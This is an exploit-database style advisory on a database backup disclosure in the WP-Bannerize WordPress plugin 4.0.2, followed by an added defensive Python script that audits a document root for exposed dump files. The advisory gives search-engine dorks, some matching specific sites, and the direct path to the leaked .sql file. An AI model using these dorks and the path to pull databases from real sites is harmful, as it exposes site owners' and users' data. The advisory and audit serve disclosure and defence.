#################################################################################################
# Exploit Title : WordPress WP-Bannerize Plugins 4.0.2 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/12/2018
# Vendor Homepage : undolog.com ~ wordpress.org/plugins/wp-bannerize/
# Software Download Link : downloads.wordpress.org/plugin/wp-bannerize.4.0.2.zip
+ github.com/jwachira/tablog/archive/master.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 4.0.2
# Exploit Risk : Medium
# Google Dorks :
inurl:"/wp-content/plugins/wp-bannerize/Classes/"
intext:"© COPYRIGHT 2018. POWERED BY WORDPRESS HOARDER THEME BY THEMEZILLA"
intext:"Powered by WP 3.2.1 & Xanthos designed by Fab Themes."
intext:"Powered by agenciaspasso.com.br"
intext:"© 2017 - Desenvolvido por Webmundo Soluções Interativas"
intext:"Developed by Paolo Romano. Copyright by BCE SRL."
intext:"Desenvolvido por E-gnição."
intext:"Zadarweb Studio"
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
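Added example (not part of this advisory or of the plugin): a defender-side audit that walks a WordPress document root and lists database dumps and backup files sitting under web-served `wp-content` paths, which is the class of exposure described above. The document-root layout and file contents below are constructed for the demonstration.

```python
"""Audit a WordPress docroot for database dumps / backup files left inside
web-served wp-content directories. Added example, not the advisory's own code."""
import tempfile
from pathlib import Path

# Static files a web server serves as-is but that should never live under
# wp-content: SQL dumps, backups, archives, editor leftovers.
RISKY_SUFFIXES = {".sql", ".sql.gz", ".bak", ".old", ".zip", ".tar.gz"}


def risky_suffix(path: Path) -> str:
    """Return the matching risky suffix ("" if none); longest match first so
    that .sql.gz / .tar.gz are reported as such rather than as .gz."""
    name = path.name.lower()
    for suf in sorted(RISKY_SUFFIXES, key=len, reverse=True):
        if name.endswith(suf):
            return suf
    return ""


def find_exposed_dumps(docroot: str) -> list:
    """Return web paths (relative to docroot) of risky files under wp-content."""
    root = Path(docroot)
    content = root / "wp-content"
    if not content.is_dir():          # not a WordPress docroot, nothing to audit
        return []
    hits = [
        "/" + p.relative_to(root).as_posix()
        for p in content.rglob("*")
        if p.is_file() and risky_suffix(p)
    ]
    return sorted(hits)


def build_sample_docroot() -> str:
    """Constructed sample install reproducing the advisory's plugin layout."""
    d = tempfile.mkdtemp(prefix="wp-audit-")
    files = {
        "wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql": "CREATE TABLE ...",
        "wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.php": "<?php",
        "wp-content/uploads/2018/12/banner.png": "",
    }
    for rel, body in files.items():
        p = Path(d, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    return d


if __name__ == "__main__":
    for hit in find_exposed_dumps(build_sample_docroot()):
        print("exposed:", hit)   # web path to remove or deny in the server config
```

Any path reported should be deleted from the install (or denied in the web server configuration) and the same check repeated after plugin updates, since an update can restore the file.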
#################################################################################################
# Example Vulnerable Sites =>
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################